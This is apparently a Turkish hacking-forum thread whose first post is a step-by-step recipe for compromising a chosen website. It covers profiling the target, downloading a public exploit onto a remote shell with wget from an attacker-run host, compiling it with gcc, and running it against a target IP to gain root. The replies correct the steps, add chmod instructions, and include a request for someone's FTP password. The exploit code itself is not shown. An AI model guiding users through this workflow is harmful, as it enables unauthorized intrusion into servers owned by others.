Remote Exploit / C. Perl. Derleme

[Partizan]

Remote Exploit / C. Perl. Derleme

Malzemeler :
Bir adet Exploit, Bir host (alan), ve Putty (program)

Hazırlanışı

hedef olarak bir site belirlendikten sonra, yapılacak ilk iş bu sitenin bilgilerini öğrenmek bunun içinde www.netcraft.com adresine girerek; Kurulu olan sistemi, IP adresleri vs bilgileri öğrenebilirsiniz..

Sistem bilgilerini bir kenara kaydettikten sonra, gerekli olan exploit`imizi hazırlamaya geldi.. bunun için www.securityfocus.com veya www.packetstromsecurity.com sitelerindeki exploitleri kullanabiliriz.. Burdan almış olduğumuz exploitin adı partizan.c olsun...

önceden hazırda bulunan host`a bunu atıyoruz...
örn: http://lastoath.hackhell.com/partizan.c
şeklinde bi adresimiz oldu..
ve Artık shellimize bağlanmama vakti geldi, bunun için putty denilen ufak bi programı kullanıcaz,, google`da arama yaptığınız taktirde bulabilirsiniz..
Programı açıp, bir kenera kaydedilen IP adresini buraya giriyoruz, Open (Connect) tuşuna basarak bağlantı kuruyoruz..
kurulduktan sonra sıra exploitimizi shell`imize taşıma vakti geldi..


Kod:
--------------------------------------------------------------------------------

wget http://lastoath.hackhell.com/partizan.c




yazıp exploit`i shell`e taşıdık.. böylece derlenmeye hazır bir exploit elde ettik..


Kod:
--------------------------------------------------------------------------------

gcc -o lastoath partizan.c




komutunu kullanarak exploitin ismini lastoath olarak değiştiriyoruz..


Kod:
--------------------------------------------------------------------------------

./lastoath




yazarak exploit`i aktif hale getiriyoruz..


Kod:
--------------------------------------------------------------------------------

./lastoath -1 201.97.123.456




bu şekilde exploit`i çalıştırarak, sitede exploit`in özelliklerine göre root yetkisi kazanmış oluruz.. bundan sonrası exploit`in özelliklerine kalıyor..

Bunları kullanabilmeniz için biraz bilgi ve unix bilginiz olması gerekli,, eğer Linux kullanıyorsanız zaten temeli unix`dir ve komutları aynıdır.. bilgisayarınızda linux kuruluysa hiç shell`e gerek duymadan exploit`i kullanabilirsiniz..

 

[OpAmP]

bir çektiğin exploit partizan.c hackerzone.c değil

iki exploitin adı değişmez bu şekilde be olarak çektiysen
partizan.c olarak çekmişin bi
ls komutunu kullanarark değişmediğini görebilirsin

-o parametresi derleme sonucu oluşacak icraedilebilir dosyanın adını koyar.

alıntı ise alıntı yazmaktançekinmeyelim
amadeğilse sorun yok.

ama yinede eline sağlık
inşallah yanlış anlaşılmamıştır

 

[zebani_81]

Evet Opamp Kesinlikle katılıyorum yazdıklarında kucucuk bir yanlış bile yok Opamp'ın lütfen dökümanının bazı yerlerinde hatalar var düzelt ?

 

[phonemon]

valla ben tam anlamı ile bu exploit shell falan filan bi şey anlayamadım. bunların asıl kaynağı yok mu??? yani exploit nedir shell nedir??? en kısa zamanda yardımlarını bekliyorum en acil tarafından bi istenin FTP şifresi gerekio bana. ve bilgili arkadaşlarım exploit bölümüne bi göz at dediler... ve beni öğle bıraktılar bu kadar ağladım şimdi siz yardım kampanyası adı altında hesaplarda açarsınız... :d

 

[wh0ppix]

-gcc ile isim değiştirdik ve her exploiti ./ * -1 ip diyemi kullandık?
-hayır

gcc ile derleme yaptık exploiti ise ./exploit adı diye çalıştırdık işlevine göre -1 ip yazarız her local root böyle çalışmaz kafa karıştırmış bence bu doküman.
şimdi dokümanı okuyup shell bulan adam ./exploit -1 ip yapmaya kalkarsa ve çalışmadığında foruma mesaj atarsa bunun sonucunda forum kirlenirse güzel olmaz değilmi?

edit:www.packetstormsecurity.org olacak üstte yanlış yazmışsın adresi

 

[dhtdarkness]

turkce konus abicim bakalım thx sora bi deneris

 

[ProwL]

Evet Opamp Kesinlikle katılıyorum yazdıklarında kucucuk bir yanlış bile yok Opamp'ın lütfen dökümanının bazı yerlerinde hatalar var düzelt ?

Konuşmayı öğrenebilsek herşeyden önce . .

 

[ericmoof]

Hehehehehehehehehe :d

 

[S_O_U_N_E_S_S]

saolasın eline sağlık

 

[spy_burax]

aga wget komutundan sorra password istio putty de oraya yazılmıo klavye işlemio yanii

 

[DoCToR_X]

arkadaşlar ben linuxa yeni geçtim ve exploit derleyemiyorum nasıl yapacam anlatırmısınız--?

 

[[KooZ]]

güzel döküman bende bi denicem bu gün

 

[babcan_]

Öncelikle yazı gerçekten biraz garip olmuş .. Bilmeyenlerin Mantık kapma bakımından etkiliyebilir.. =)

ama Ellerine sağlık uraşmışsın yinede .. arkadaşların dediği gibi ..

aga wget komutundan sorra password istio putty de oraya yazılmıo klavye işlemio yanii

Putty de şifre istemesi normal

Putty den ssh desteği veren kendi hostuna bağlanıosun eğer hostun shell desteklio ise. sen aynı şifre ile giriceksin oraya .. sonra adımları izliceksin ..

arkadaşlar ben linuxa yeni geçtim ve exploit derleyemiyorum nasıl yapacam anlatırmısınız--?

İlk önce Exploiti url den çekiceksin ( yada pcnde varsa takma )

wget http://babcan.com/babcan.c

gibi

Aslında yukarıda şöyle bi eksiklik var .. =)

Uzaktan çekilen dosyada perm ler ayarlanmamış olur ..

Çalıştırabilmen için dosyayı yada compile edebilmen için Çalıştırabilme izni vermen lazım ..

onuda

chmod +x babcan.c

şeklinde yapıcaksın

sonra kodu compile ediceksin

gcc -o babcan babcan.c

yine ls -la den baktığında orada

babcan olarak compile edilmiş dosyayı görüceksin zaten ..

./babcan

olarak çalıştırcaksın ..

yukarıda arkadaşın - ile çalıştırma olayı tamamen exploitin içieriğine ve yapabileceklerine bağlı .. =)

neyse Kolay gele

 

[aRiza_]

wget komutundan sonra pasaport istemez

example wget http://exploit.adresi

 

[TürKReiS]

Eline sağlık..

 

[lethal1453]

Ya arkadaşlar herşey tamam da bende putty ı kullanırken login as diyor kullanıcı adını giriyorum şifreyi yazarken tuşlar çalışmıyorr???

 

[zanzara2]

saolasın ellerine sağlık

 

[kraql]

güzel denedimde beceremedim